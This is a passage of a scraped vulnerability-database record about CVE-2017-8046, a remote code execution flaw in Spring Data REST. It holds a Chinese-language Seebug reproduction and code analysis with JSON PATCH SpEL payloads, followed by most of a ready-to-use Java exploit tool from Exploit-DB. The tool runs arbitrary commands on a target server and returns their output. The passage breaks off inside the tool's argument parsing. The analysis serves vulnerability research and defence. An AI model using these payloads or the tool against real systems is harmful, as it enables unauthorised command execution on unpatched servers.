\u6f0f\u6d1e\u590d\u73b0\r\n\u53c2\u8003Spring boot\u5b98\u65b9\u6587\u6863\uff0c\u642d\u5efa\u5b58\u5728spring-data-rest\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u7684\u9776\u673a\u73af\u5883\uff0cpom.xml\u6240\u9700\u7ec4\u4ef6\u5185\u5bb9\u5982\u4e0b\u3002\u9776\u673a\u793a\u4f8b\u4ee3\u7801\u53ef\u4ee5\u4e0b\u8f7d\r\n\r\nhttps://github.com/JavaPentesters/java_vul_target\r\n```\r\n <dependencies>\r\n<dependency>\r\n<groupId>org.springframework.boot</groupId>\r\n<artifactId>spring-boot-dependencies</artifactId>\r\n<version>1.4.3.RELEASE</version>\r\n<type>pom</type>\r\n<scope>import</scope>\r\n</dependency>\r\n<dependency>\r\n<groupId>org.springframework.boot</groupId>\r\n<artifactId>spring-boot-starter-data-rest</artifactId>\r\n<version>1.4.3.RELEASE</version>\r\n</dependency>\r\n\r\n<dependency>\r\n<groupId>org.springframework.boot</groupId>\r\n <artifactId>spring-boot-starter-data-jpa</artifactId>\r\n<version>1.4.3.RELEASE</version>\r\n<exclusions>\r\n<exclusion>\r\n<groupId>org.springframework</groupId>\r\n<artifactId>spring-beans</artifactId>\r\n</exclusion>\r\n</exclusions>\r\n</dependency>\r\n\r\n<dependency>\r\n<groupId>com.h2database</groupId>\r\n<artifactId>h2</artifactId>\r\n<version>1.4.193</version>\r\n<scope>runtime</scope>\r\n</dependency>\r\n\r\n<dependency>\r\n<groupId>com.jayway.jsonpath</groupId>\r\n<artifactId>json-path</artifactId>\r\n<version>2.2.0</version>\r\n<scope>test</scope>\r\n</dependency>\r\n<dependency>\r\n<groupId>javax.persistence</groupId>\r\n<artifactId>persistence-api</artifactId>\r\n<version>1.0</version>\r\n</dependency>\r\n<dependency>\r\n<groupId>junit</groupId>\r\n <artifactId>junit</artifactId>\r\n<version>4.12</version>\r\n<scope>test</scope>\r\n</dependency>\r\n\r\n</dependencies>\r\n```\r\n\r\n1\u3001\u521b\u5efa\u5b9e\u4f53\u7c7b\r\n\r\n```\r\n@Entity\r\npublic\r\nclass Product {\r\n @Id\r\n @GeneratedValue(strategy = GenerationType.AUTO)\r\n private long id;\r\n\r\n @Column\r\n private String name;\r\n\r\n @Column\r\n private long price;\r\n \u2026\u2026\u2026\u2026\u2026\u2026..getter setter\r\n}\r\n```\r\n\r\n2\u3001\u521b\u5efaRepository\u63a5\u53e3\r\n```\r\n@RepositoryRestResource(collectionResourceRel= \"product\", path = \"product\")\r\npublic interface ProductService extends PagingAndSortingRepository<Product, Long> {\r\n}\r\nProductService\u662f\u4e00\u4e2a\u7ee7\u627fPagingAndSortingRepository\u7684\u63a5\u53e3\uff0c\u53ef\u4ee5\u5b9e\u73b0\u5bf9Product\u5bf9\u8c61\u8fdb\u884c\u5404\u79cd\u64cd\u4f5c\u3002\u5728\u5e94\u7528\u8fd0\u884c\u7684\u65f6\u5019\uff0cSpring-Data-REST\u5c06\u81ea\u52a8\u521b\u5efa\u6b64\u63a5\u53e3\u7684\u5b9e\u73b0\u3002\u7136\u540e\uff0c\u5b83\u5c06\u4f7f\u7528@RepositoryRestResource\u6ce8\u89e3\u8ba9Spring MVC\u5728/people\u8def\u5f84\u5904\u4f5c\u4e3arestful\u63a5\u53e3\u7684\u5165\u53e3\u70b9\u3002\r\n```\r\n\r\n3\u3001spring boot \u542f\u52a8\u7a0b\u5e8f\r\n```\r\n@SpringBootApplication\r\npublic class SpringDataRestApplication {\r\n public static void main(String[] args) {\r\n SpringApplication.run(SpringDataRestApplication.class, args);\r\n }\r\n}\r\n```\r\n\r\n4\u3001\u521b\u5efaproduct\u5b9e\u4f53\u8bb0\u5f55\r\n\r\n![](https://images.seebug.org/1520393978218)\r\n\r\n![](https://images.seebug.org/1520393986818)\r\n\r\n\r\n\r\n\u5411\u670d\u52a1\u5668\u7aef\u53d1\u9001 HTTP JSON PATCH\u8bf7\u6c42\u7528\u4e8e\u4fee\u6539\u4ea7\u54c1\u4ef7\u683c\uff0c\u5176\u4e2d\u8bf7\u6c42\u4f53header\u7684contente-type\u503c\u5fc5\u987b\u9075\u5faa\u89c4\u8303\u8bbe\u4e3a `Content-Type:application/json-patch+json`\u3002\r\n\r\n![](https://images.seebug.org/1520394009564)\r\n\r\n\r\n\u4fee\u6539id\u4e3a1\u7684product\u7684price\u503c\u4e3a88\uff0cJSON Path\u63d0\u4ea4\u7684\u6570\u636e\u5fc5\u987b\u5305\u542bpath\u548cop\u5b57\u6bb5, op\u8868\u793a\u5177\u4f53\u64cd\u4f5c, path\u7528\u4e8e\u5b9a\u4f4d\u51c6\u786e\u6570\u636e\u5b57\u6bb5\u3002\u6839\u636eRFC2616\u6807\u51c6\u6587\u6863\u5b9a\u4e49\uff0cop\u5b9a\u4e49\u4e86\u4ee5\u4e0b\u51e0\u79cd\u64cd\u4f5c\uff1aadd\u3001remove\u3001replace\u3001move\u3001copy\u3001test\u7b49\u3002\r\n\r\n![](https://images.seebug.org/1520394022990)\r\n\r\n\u4ece\u5b98\u65b9\u6f0f\u6d1e\u4fee\u8865\u7684\u65b9\u6848\u6765\u770b\uff0c\u5ba2\u6237\u7aef\u4f20\u5165\u7684JSONPATCH path\u4f1a\u8f6c\u6362\u6210Spel\u8868\u8fbe\u5f0f\u3002\u7136\u800c\u5728\u6267\u884cPatchOperation.evaluateValueFromTarget\u65b9\u6cd5\u65f6\uff0c \u7a0b\u5e8f\u672a\u8fdb\u884c\u5b89\u5168\u6821\u9a8c\u4ece\u800c\u89e6\u53d1\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u5b98\u65b9\u589e\u52a0\u4e86verifyPath\u65b9\u6cd5\u7528\u4e8e\u68c0\u9a8cpath\u6709\u6548\u6027\uff0c\u6839\u636e\u7ed9\u5b9a\u7684source\u548ctype\u63d0\u53d6\u51faPropertyPath\u7684\u94fe\u5f0f\u8def\u5f84\uff0c\u5e95\u5c42\u4e3b\u8981\u901a\u8fc7\u53cd\u5c04\u65b9\u5f0f\u8fdb\u884c\u5904\u7406\uff0c\u5982\u679c\u751f\u6210\u5931\u8d25\uff0c\u5219\u629b\u51faPatchException\uff0c\u6f0f\u6d1e\u4e5f\u5c31\u6ca1\u6709\u529e\u6cd5\u89e6\u53d1\u3002\r\n\r\n![](https://images.seebug.org/1520394033875)\r\n\r\n\r\n\u6211\u4eec\u6784\u9020\u5982\u4e0bPOC\u89e6\u53d1spring-data-rest\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff1a\r\n```\r\n[{ \"op\": \"replace\", \"path\": \"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new\r\nbyte[]{109,107,100,105,114,32,45,112,32,47,116,109,112,47,116,101,115,116}))/price\", \"value\": \"88\" }]\r\n```\r\n\r\nRCE\u6f0f\u6d1e\u6210\u529f\u89e6\u53d1\r\n\r\n![](https://images.seebug.org/1520394059323)\r\n\r\n![](https://images.seebug.org/1520394066497)\r\n\r\n\r\n### \u539f\u7406\u5206\u6790\r\n\r\n1 HTTP JSON PATCH\u65b9\u6cd5\r\n\r\nPATCH\u65b9\u6cd5\u662f\u65b0\u5f15\u5165\u7684\uff0c\u662f\u5bf9PUT\u65b9\u6cd5\u7684\u8865\u5145\uff0c\u7528\u6765\u5bf9\u5df2\u77e5\u8d44\u6e90\u8fdb\u884c\u5c40\u90e8\u66f4\u65b0\u3002\u5728HTTP\u539f\u672c\u7684\u5b9a\u4e49\u4e2d[RFC2616]\uff0c\u7528\u4e8e\u4e0a\u4f20\u6570\u636e\u7684\u65b9\u6cd5\u53ea\u6709POST\u548cPUT\u3002\u540e\u6765\u9274\u4e8ePOST\u548cPUT\u8bed\u4e49\u548c\u529f\u80fd\u4e0a\u7684\u4e0d\u8db3\uff0c\u53c8\u52a0\u5165\u4e86PATCH\u65b9\u6cd5[RFC5789]\u3002\r\n\r\nJSON PATCH\u8bf7\u6c42\u65b9\u6cd5IETF\u5236\u5b9a\u4e86\u6807\u51c6RFC6902\uff0c\u5fc5\u987b\u5305\u542b\u4e00\u4e2apath\u548cop\u5b57\u6bb5, op\u8868\u793a\u5177\u4f53\u64cd\u4f5c, path\u7528\u4e8e\u5b9a\u4f4d\u51c6\u786e\u6570\u636e\u5b57\u6bb5\u3002PATCH\u64cd\u4f5c\u53ef\u4ee5\u7528\u7c7b\u4f3c\u4e8e\u8fd9\u6837\u7684\u6307\u4ee4\"set\r\nfield x to this value\"\u6765\u89e3\u91ca\u3002JSON Patch\u6709\u81ea\u5df1\u7684MIME\u7c7b\u578b: application/json-patch+json. RFC6902\u6807\u51c6\u6587\u6863\u53ef\u4ee5\u53c2\u8003:https://tools.ietf.org/html/rfc6902\r\n\r\n\r\n\r\n2 spel\u8868\u8fbe\u5f0f\u8bed\u8a00\r\n\r\nSpel(Spring Excpression Language)\u662fSpring3\u5f00\u59cb\u63d0\u4f9b\u7684\u901a\u7528\u8868\u8fbe\u5f0f\u8bed\u8a00\u5de5\u5177,\u8bed\u6cd5\u4e0eognl\u8868\u8fbe\u5f0f\u5341\u5206\u7c7b\u4f3c\u3002Spel\u662f\u4e00\u4e2a\u5f88\u5f3a\u5927\u7684\u5de5\u5177\u7528\u4e8e\u5728\u8fd0\u884c\u67e5\u8be2\u548c\u64cd\u7eb5\u4f5c\u5bf9\u8c61\u56fe\u3002Spel\u8bed\u8a00\u7684\u8bed\u6cd5\u7c7b\u4f3c\u4e8e\u7edf\u4e00\u6807\u51c6\u7684el\u8868\u8fbe\u5f0f\uff0c\u4f46\u63d0\u4f9b\u989d\u5916\u7684\u7279\u6027\u3002\u6700\u4e3a\u663e\u8457\u7684\u662f\u65b9\u6cd5\u8c03\u7528\u548c\u57fa\u672c\u5b57\u7b26\u4e32\u6a21\u677f\u5904\u7406\u65b9\u6cd5\u3002\r\n\r\nSpel\u8bed\u8a00\u57fa\u672c\u7279\u6027\u5305\u62ec\uff1a\u5b57\u9762\u503c\u8868\u8fbe\u5f0f\u3001\u5e03\u5c14\u548c\u5173\u7cfb\u578b\u64cd\u4f5c\u3001\u6b63\u5219\u8868\u8fbe\u5f0f\u3001\u7c7b\u8868\u8fbe\u5f0f\u3001\u8bbf\u95ee\u5c5e\u6027,\u6570\u7ec4\uff0c\u5217\u8868\uff0cmap\u3001\u65b9\u6cd5\u8c03\u7528\u3001\u5173\u7cfb\u64cd\u4f5c\u3001\u8d4b\u503c\u3001\u8c03\u7528\u6784\u9020\u51fd\u6570\u3001Bean\u7684\u5f15\u7528\u3001\u6784\u5efa\u6570\u7ec4\u3001\u4e09\u5143\u8fd0\u7b97\u7b26\u7b49\u3002\r\n\r\nSpel\u8868\u8fbe\u5f0f\u8bed\u8a00\u57fa\u672c\u4f7f\u7528\u65b9\u6cd5\u5730\u5740:\r\n\r\nhttps://docs.spring.io/spring/docs/current/spring-framework-reference/core.html#expressions\r\n\r\n\r\n\r\n3\r\n\u6f0f\u6d1e\u6e90\u7801\u5ba1\u8ba1\r\n\r\nJsonPatchHandler\u5904\u7406\u5668\u7528\u4e8e\u5904\u7406HTTP Json Patch\u7c7b\u578b\u8bf7\u6c42\u3002\r\n\r\n![](https://images.seebug.org/1520394097779)\r\n\r\n![](https://images.seebug.org/1520394106381)\r\n\r\n\r\n```\r\npublic <T> T apply(IncomingRequest request, T target) throws Exception {\r\n Assert.notNull(request, \"Request must not be null!\");\r\n Assert.isTrue(request.isPatchRequest(), \"Cannot handle non-PATCH request!\");\r\n Assert.notNull(target, \"Target must not be null!\");\r\n\r\n if (request.isJsonPatchRequest()) {\r\n return applyPatch(request.getBody(), target);\r\n } else {\r\n return applyMergePatch(request.getBody(), target);\r\n }\r\n}\r\n```\r\n\r\nrequest.isJsonPatchRequest\u7528\u4e8e\u5224\u65ad\u662f\u5426\u4e3aJson Patch \u7c7b\u578b\u8bf7\u6c42\u3002\r\n```\r\npublic boolean isJsonPatchRequest() {\r\n\treturn isPatchRequest() \r\n\t&& RestMediaTypes.JSON_PATCH_JSON.isCompatibleWith(contentType);\r\n}\r\n```\r\n\r\n![](https://images.seebug.org/1520394136779)\r\n\r\nJsonPatchPatchConverter\u7528\u4e8e\u5c06JsonNode\u8282\u70b9\u8f6c\u5316\u4e3aPatch\u5bf9\u8c61\uff0cPatch\u4ee3\u8868\u4e00\u4e2apatch\u64cd\u4f5c\u5217\u8868\u3002\r\n\r\n![](https://images.seebug.org/1520394158724)\r\n\r\n![](https://images.seebug.org/1520394169233)\r\n\r\n\r\n\r\n\r\n```\r\nprivate static String pathNodesToSpEL(String[] pathNodes) {\r\n\t\tStringBuilder spelBuilder = new StringBuilder();\r\n\r\n\t\tfor (int i = 0; i < pathNodes.length; i++) {\r\n\r\n\t\t\tString pathNode = pathNodes[i];\r\n\r\n\t\t\tif (pathNode.length() == 0) {\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t\tif (\"~\".equals(pathNode)) {\r\n\t\t\t\tspelBuilder.append(\"[size() - 1]\");\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t\ttry {\r\n\r\n\t\t\t\tint index = Integer.parseInt(pathNode);\r\n\t\t\t\tspelBuilder.append('[').append(index).append(']');\r\n\r\n\t\t\t} catch (NumberFormatException e) {\r\n\r\n\t\t\t\tif (spelBuilder.length() > 0) {\r\n\t\t\t\t\tspelBuilder.append('.');\r\n\t\t\t\t}\r\n\r\n\t\t\t\tspelBuilder.append(pathNode);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tString spel = spelBuilder.toString();\r\n\r\n\t\tif (spel.length() == 0) {\r\n\t\t\tspel = \"#this\";\r\n\t\t}\r\n\r\n\t\treturn spel;\r\n\t}\r\n```\r\n\r\n\r\n\r\n\u4ee5\u4e0a\u4e3a\u5c06json patch\u8bf7\u6c42\u4f53path\u89e3\u6790\u751f\u6210\u4e3aSpel\u8868\u8fbe\u5f0f\u7684\u6267\u884c\u8def\u5f84\r\n```\r\nPatchOperation.pathToExpression(path)\r\n\tPathToSpel.pathToSpEL(path)\r\n\tPathToSpel.pathNodesToSpEL(path.split(\"\\\\/\"))\r\n\t\r\nPath.app(in, type)\r\n\tPatchOperation.perform(in, type)\r\n\tReploaceOperation.setValueOnTarget(target,evaluateValueFromTarget(target, type))\r\nprotected <T> Object evaluateValueFromTarget(Object targetObject, Class<T> entityType) {\r\n\t\treturn value instanceof LateObjectEvaluator\r\n\t\t\t\t? ((LateObjectEvaluator) value).evaluate(spelExpression.getValueType(targetObject)) : value;\r\n\t}\r\n```\r\n\r\nSpelExpression\u6267\u884csetVaule\u64cd\u4f5c\u65f6\u6f0f\u6d1e\u88ab\u89e6\u53d1\u3002\r\n```\r\n ExpressionParser parser = new SpelExpressionParser();\r\n Expression exp \r\n= parser.parseExpression(\"T(java.lang.Runtime).getRuntime().exec('calc.exe').name\");\r\n exp.setValue(\"\", \"\");\r\n```\r\n![](https://images.seebug.org/1520394201328)", "cvss3": {}, "published": "2018-03-07T00:00:00", "type": "seebug", "title": "Spring data rest \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c(cve-2017-8046)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8046"], "modified": "2018-03-07T00:00:00", "id": "SSV:97160", "href": "https://www.seebug.org/vuldb/ssvid-97160", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2022-08-16T02:16:13", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-15T00:00:00", "type": "exploitdb", "title": "Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2017-8046", "CVE-2017-8046"], "modified": "2018-03-15T00:00:00", "id": "EDB-ID:44289", "href": "https://www.exploit-db.com/exploits/44289", "sourceData": "// Exploit Title: RCE in PATCH requests in Spring Data REST\r\n// Date: 2018-03-10\r\n// Exploit Author: Antonio Francesco Sardella\r\n// Vendor Homepage: https://pivotal.io/\r\n// Software Link: https://projects.spring.io/spring-data-rest/\r\n// Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1)\r\n// Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE'\r\n// CVE: CVE-2017-8046\r\n// Category: Webapps\r\n// Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046\r\n// Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp\r\n// Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com\r\n\r\npackage com.afs.exploit.spring;\r\n\r\nimport java.io.BufferedReader;\r\nimport java.io.IOException;\r\nimport java.io.InputStreamReader;\r\nimport java.net.URI;\r\nimport java.net.URISyntaxException;\r\n\r\nimport org.apache.http.HttpResponse;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.methods.HttpPatch;\r\nimport org.apache.http.entity.StringEntity;\r\nimport org.apache.http.impl.client.HttpClientBuilder;\r\n\r\n/**\r\n * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).\r\n * This software is written to have as less external dependencies as possible.\r\n * DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please\r\n * use this tool responsibly. I do not take responsibility for the way in which any one uses this application.\r\n * I am NOT responsible for any damages caused or any crimes committed by using this tool.\r\n * ..................\r\n * . CVE-ID ........: CVE-2017-8046\r\n * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046\r\n * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST\r\n * .................. versions prior to 2.5.12, 2.6.7, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring\r\n * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary\r\n * .................. Java code.\r\n * ..................\r\n * \r\n * @author Antonio Francesco Sardella\r\n */\r\npublic class SpringBreakCve20178046 {\r\n\r\n /**\r\n * Version string.\r\n */\r\n private static final String VERSION = \"v1.0 (2018-03-10)\";\r\n\r\n /**\r\n * The JSON Patch object.\r\n */\r\n private static String JSON_PATCH_OBJECT = \"[{ \\\"op\\\" : \\\"replace\\\", \\\"path\\\" : \\\"%s\\\", \\\"value\\\" : \\\"pwned\\\" }]\";\r\n\r\n /**\r\n * This is a way to bypass the split and 'replace'\r\n * logic performed by the framework on slashes.\r\n */\r\n private static String SLASH = \"T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))\";\r\n\r\n /**\r\n * Used to encode chars.\r\n */\r\n private static String CHAR_ENCODING = \"T(java.lang.Character).toChars(%d)[0]\";\r\n\r\n /**\r\n * Malicious payload.\r\n */\r\n private static String PAYLOAD;\r\n\r\n /**\r\n * Malicious payload initialization.\r\n */\r\n static {\r\n PAYLOAD = \"T(org.springframework.util.StreamUtils).copy(\";\r\n PAYLOAD += \"T(java.lang.Runtime).getRuntime().exec(\";\r\n PAYLOAD += \"(\";\r\n PAYLOAD += \"T(java.lang.System).getProperty(\\\\\\\"os.name\\\\\\\").toLowerCase().contains(\\\\\\\"win\\\\\\\")\";\r\n PAYLOAD += \"?\";\r\n PAYLOAD += \"\\\\\\\"cmd \\\\\\\"+\" + SLASH + \"+\\\\\\\"c \\\\\\\"\";\r\n PAYLOAD += \":\";\r\n PAYLOAD += \"\\\\\\\"\\\\\\\"\";\r\n PAYLOAD += \")+\";\r\n PAYLOAD += \"%s\"; // The encoded command will be placed here.\r\n PAYLOAD += \").getInputStream()\";\r\n PAYLOAD += \",\";\r\n PAYLOAD += \"T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()\";\r\n PAYLOAD += \".getResponse().getOutputStream()\";\r\n PAYLOAD += \").x\";\r\n }\r\n\r\n /**\r\n * Error cause string that can be used to \"clean the response.\"\r\n */\r\n private static String ERROR_CAUSE = \"{\\\"cause\";\r\n\r\n /**\r\n * The target URL.\r\n */\r\n private URI url;\r\n\r\n /**\r\n * The command that will be executed on the remote machine.\r\n */\r\n private String command;\r\n\r\n /**\r\n * Cookies that will be passed.\r\n */\r\n private String cookies;\r\n\r\n /**\r\n * Flag used to remove error messages in output due to\r\n * the usage of the exploit. It could hide error messages\r\n * if the request fails for other reasons.\r\n */\r\n private boolean cleanResponse;\r\n\r\n /**\r\n * Verbosity flag.\r\n */\r\n private boolean verbose;\r\n\r\n /**\r\n * Default constructor.\r\n */\r\n public SpringBreakCve20178046() {\r\n this.verbose = false;\r\n this.cleanResponse = false;\r\n }\r\n\r\n /**\r\n * Performs the exploit.\r\n * \r\n * @throws IOException\r\n * If something bad occurs during HTTP GET.\r\n */\r\n public void exploit() throws IOException {\r\n checkInput();\r\n printInput();\r\n String payload = preparePayload();\r\n String response = httpPatch(payload);\r\n printOutput(response);\r\n }\r\n\r\n /**\r\n * Checks the input.\r\n */\r\n private void checkInput() {\r\n if (this.url == null) {\r\n throw new IllegalArgumentException(\"URL must be passed.\");\r\n }\r\n\r\n if (isEmpty(this.command)) {\r\n throw new IllegalArgumentException(\"Command must be passed.\");\r\n }\r\n }\r\n\r\n /**\r\n * Prints input if verbose flag is true.\r\n */\r\n private void printInput() {\r\n if (isVerbose()) {\r\n System.out.println(\"[*] Target URL ........: \" + this.url);\r\n System.out.println(\"[*] Command ...........: \" + this.command);\r\n System.out.println(\"[*] Cookies ...........: \" + (isEmpty(this.cookies) ? \"(no cookies)\" : this.cookies));\r\n }\r\n }\r\n\r\n /**\r\n * Prepares the payload.\r\n * \r\n * @return The malicious payload that will be injected.\r\n */\r\n private String preparePayload() {\r\n System.out.println(\"[*] Preparing payload.\");\r\n\r\n String command = encodingCommand(); // Encoding inserted command.\r\n String payload = String.format(PAYLOAD, command); // Preparing Java payload.\r\n payload = String.format(JSON_PATCH_OBJECT, payload); // Placing payload into JSON Patch object.\r\n\r\n if (isVerbose()) {\r\n System.out.println(\"[*] Payload ...........: \" + payload);\r\n }\r\n\r\n return payload;\r\n }\r\n\r\n /**\r\n * Encodes the inserted command.\r\n * PROS: No problems in interpreting things.\r\n * CONS: Payload too long.\r\n * \r\n * @return The encoded command.\r\n */\r\n private String encodingCommand() {\r\n StringBuffer encodedCommand = new StringBuffer(\"T(java.lang.String).valueOf(new char[]{\");\r\n\r\n int commandLength = this.command.length();\r\n for (int i = 0; i < commandLength; i++) {\r\n encodedCommand.append(String.format(CHAR_ENCODING, (int) this.command.charAt(i)));\r\n if (i + 1 < commandLength) {\r\n encodedCommand.append(\",\");\r\n }\r\n }\r\n\r\n encodedCommand.append(\"})\");\r\n\r\n if (isVerbose()) {\r\n System.out.println(\"[*] Encoded command ...: \" + encodedCommand.toString());\r\n }\r\n\r\n return encodedCommand.toString();\r\n }\r\n\r\n /**\r\n * HTTP PATCH operation on the target passing the malicious payload.\r\n * \r\n * @param payload\r\n * The malicious payload.\r\n * @return The response as a string.\r\n * @throws IOException\r\n * If something bad occurs during HTTP GET.\r\n */\r\n private String httpPatch(String payload) throws IOException {\r\n System.out.println(\"[*] Sending payload.\");\r\n\r\n // Preparing PATCH operation.\r\n HttpClient client = HttpClientBuilder.create().build();\r\n HttpPatch patch = new HttpPatch(this.url);\r\n patch.setHeader(\"User-Agent\", \"Mozilla/5.0\");\r\n patch.setHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n patch.setHeader(\"Content-Type\", \"application/json-patch+json\"); // This is a JSON Patch.\r\n if (!isEmpty(this.cookies)) {\r\n patch.setHeader(\"Cookie\", this.cookies);\r\n }\r\n patch.setEntity(new StringEntity(payload));\r\n\r\n // Response string.\r\n StringBuffer response = new StringBuffer();\r\n\r\n // Executing PATCH operation.\r\n HttpResponse httpResponse = client.execute(patch);\r\n if (httpResponse != null) {\r\n\r\n // Reading response code.\r\n if (httpResponse.getStatusLine() != null) {\r\n int responseCode = httpResponse.getStatusLine().getStatusCode();\r\n System.out.println(\"[*] HTTP \" + responseCode);\r\n } else {\r\n System.out.println(\"[!] HTTP response code can't be read.\");\r\n }\r\n\r\n // Reading response content.\r\n if (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) {\r\n BufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));\r\n String inputLine;\r\n\r\n while ((inputLine = in.readLine()) != null) {\r\n response.append(inputLine);\r\n response.append(System.getProperty(\"line.separator\"));\r\n }\r\n in.close();\r\n } else {\r\n System.out.println(\"[!] HTTP response content can't be read.\");\r\n }\r\n\r\n } else {\r\n System.out.println(\"[!] HTTP response is null.\");\r\n }\r\n\r\n return response.toString();\r\n }\r\n\r\n /**\r\n * Prints output.\r\n * \r\n * @param response\r\n * Response that will be printed.\r\n */\r\n private void printOutput(String response) {\r\n if (!isEmpty(response)) {\r\n System.out.println(\"[*] vvv Response vvv\");\r\n\r\n // Cleaning response (if possible).\r\n if (isCleanResponse() && response.contains(ERROR_CAUSE)) {\r\n String cleanedResponse = response.split(\"\\\\\" + ERROR_CAUSE)[0];\r\n System.out.println(cleanedResponse);\r\n } else {\r\n System.out.println(response);\r\n }\r\n\r\n System.out.println(\"[*] ^^^ ======== ^^^\");\r\n }\r\n }\r\n\r\n /**\r\n * Checks if an input string is null/empty or not.\r\n * \r\n * @param input\r\n * The input string to check.\r\n * @return True if the string is null or empty, false otherwise.\r\n */\r\n private boolean isEmpty(String input) {\r\n boolean isEmpty;\r\n\r\n if (input == null || input.trim().length() < 1) {\r\n isEmpty = true;\r\n } else {\r\n isEmpty = false;\r\n }\r\n\r\n return isEmpty;\r\n }\r\n\r\n /* Getters and setters. */\r\n\r\n public boolean isVerbose() {\r\n return verbose;\r\n }\r\n\r\n public void setVerbose(boolean verbose) {\r\n this.verbose = verbose;\r\n }\r\n\r\n public void setUrl(String url) throws URISyntaxException {\r\n if (isEmpty(url)) {\r\n throw new IllegalArgumentException(\"URL must be not null and not empty.\");\r\n }\r\n\r\n this.url = new URI(url.trim());\r\n }\r\n\r\n public void setCommand(String command) {\r\n if (isEmpty(command)) {\r\n throw new IllegalArgumentException(\"Command must be not null and not empty.\");\r\n }\r\n\r\n this.command = command.trim();\r\n }\r\n\r\n public void setCookies(String cookies) {\r\n if (cookies != null) {\r\n cookies = cookies.trim();\r\n }\r\n\r\n this.cookies = cookies;\r\n }\r\n\r\n public boolean isCleanResponse() {\r\n return cleanResponse;\r\n }\r\n\r\n public void setCleanResponse(boolean cleanResponse) {\r\n this.cleanResponse = cleanResponse;\r\n }\r\n\r\n /**\r\n * Shows the program help.\r\n */\r\n public static final void help() {\r\n System.out.println(\"Usage:\");\r\n System.out.println(\" java -jar spring-break_cve-2017-8046.jar [options]\");\r\n System.out.println(\"Description:\");\r\n System.out.println(\" Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).\");\r\n System.out.println(\"Options:\");\r\n System.out.println(\" -h, --help\");\r\n System.out.println(\" Prints this help and exits.\");\r\n System.out.println(\" -u, --url [target_URL]\");\r\n System.out.println(\" The target URL where the exploit will be performed.\");\r\n System.out.println(\" You have to choose an existent resource.\");\r\n System.out.println(\" -cmd, --command [command_to_execute]\");\r\n System.out.println(\" The command that will be executed on the remote machine.\");\r\n System.out.println(\" --cookies [cookies]\");\r\n System.out.println(\" Optional. Cookies passed into the request, e.g. authentication cookies.\");\r\n System.out.println(\" --clean\");\r\n System.out.println(\" Optional. Removes error messages in output due to the usage of the\");\r\n System.out.println(\" exploit. It could hide error messages if the request fails for other reasons.\");\r\n System.out.println(\" -v, --verbose\");\r\n System.out.println(\" Optional. Increase verbosity.\");\r\n }\r\n\r\n /**\r\n * Main method.\r\n * \r\n * @param args\r\n * Input arguments\r\n */\r\n public static void main(String[] args) {\r\n try {\r\n System.out.println(\"'Spring Break' RCE (CVE-2017-8046) - \" + VERSION);\r\n SpringBreakCve20178046 o = new SpringBreakCve20178046();\r\n\r\n if (args.length > 0) {\r\n for (int i = 0; i < args.length; i++) {\r\n\r\n String p = args[i];\r\n\r\n if ((\"-h\".equals(p) || \"--help\".equals(p)) && i == 0) {\r\n SpringBreakCve20178046.help();\r\n return;\r\n } else if (\"-u\".equals(p) || \"--url\".equals(p)) {\r\n\r\n if (i + 1 > args.length - 1) {\r\n throw new IllegalArgumentException(\"URL must be passed.\");\r\n }\r\n o.setUrl(args[++i]);\r\n\r\n } else if (\"-cmd\".equals(p) || \"--command\".equals(p)) {\r\n\r\n if (i + 1 > args.length - 1) {\r\n throw new IllegalArgumentException(\"Command must be passed.\");\r\n }\r\n o.setCommand(args[++i]);\r\n\r\n } else if 